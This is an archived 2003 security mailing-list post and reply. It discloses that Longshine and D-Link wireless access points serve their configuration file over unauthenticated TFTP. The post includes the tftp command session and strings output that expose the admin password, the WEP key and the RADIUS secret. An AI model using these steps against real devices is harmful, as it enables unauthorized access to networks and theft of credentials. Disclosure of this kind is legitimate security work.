OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
heydowns_at_borg.com
Date: Mon Jan 06 2003 - 12:57:52 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    This vulnerability is also an issue on the popular DLink DI-614+ (which I
    think is based upon the Longshine product). I was able to grab config.img
    and also extract the "admin" password from it. This was confirmed with
    firmware version 2.03 dated 9/10/2002.

    On the DLink product, you can only perform this from the "LAN-side" of the
    device in the default configuration.

    DLink has version 2.10 available, dated 11/25/2002, but I have not tried
    it yet.

            -Jeff

    On Mon, 6 Jan 2003, Lukas Grunwald wrote:

    >
    >
    > Hardware: Longshine LCS-883R-AC-B External WLAN Access Point 22 Mbps
    >
    > Software: ThreadX ARM7/Green Hills Version G3.0f.3.0c from Express Logic Inc.
    >
    > Description: Get Superuser Privileges and view the devices password and password and other passwords
    >
    > Versions affected: tested with 03.01.0b and 03.01.0h
    >
    > Vendor contacted: e-mailed Longshine at Sun Dec 29
    >
    > Details: You are able to connect via tftp to the access-point an you can get download the configuration
    > without authentication the WEP Secret for the encryption and the password from your radius server is also readable.
    > In this configuration in the Username of the Superuser and the corresponding password stored.
    > The WEP Secret for the encryption and the password from your radius server is also readable.
    > This "attack" works via WLAN (!!!) and Ethernet.
    >
    > tftp
    > tftp> connect 192.168.108.48
    > tftp> get config.img
    > Received 780 bytes in 1.0 seconds
    > tftp> quit
    >
    > [~]/-\>strings config.img
    > DNXLABAP01 <- name of the AP
    > root <- name of the superuser
    > XXXXXX123 <- password from superuser
    > DNXLABLAN <- ssid
    > secu9 <- secret for WEP
    > 7890abcdef <-
    >
    > You are also able to get the following files:
    >
    > config.img
    > wbtune.dat
    > mac.dat
    > rom.img
    > normal.img
    >
    >
    > Solution: after contact with the vendor he claims that a new firmware-upgrade
    > fixes this problem, but the latest available firmware on his web-page
    > dosn't fix it anyway.
    >
    > Vendor-Contact:
    >
    > LONGSHINE Technologie (Europe) GmbH
    >
    > An der Strusbek 9
    > D-22926 Ahrensburg
    >
    > Tel: ++ 49 ( 0 ) 4102 / 4922- 0
    > Fax: ++ 49 ( 0 ) 4102 / 40109
    >
    > supportlongshine.de
    >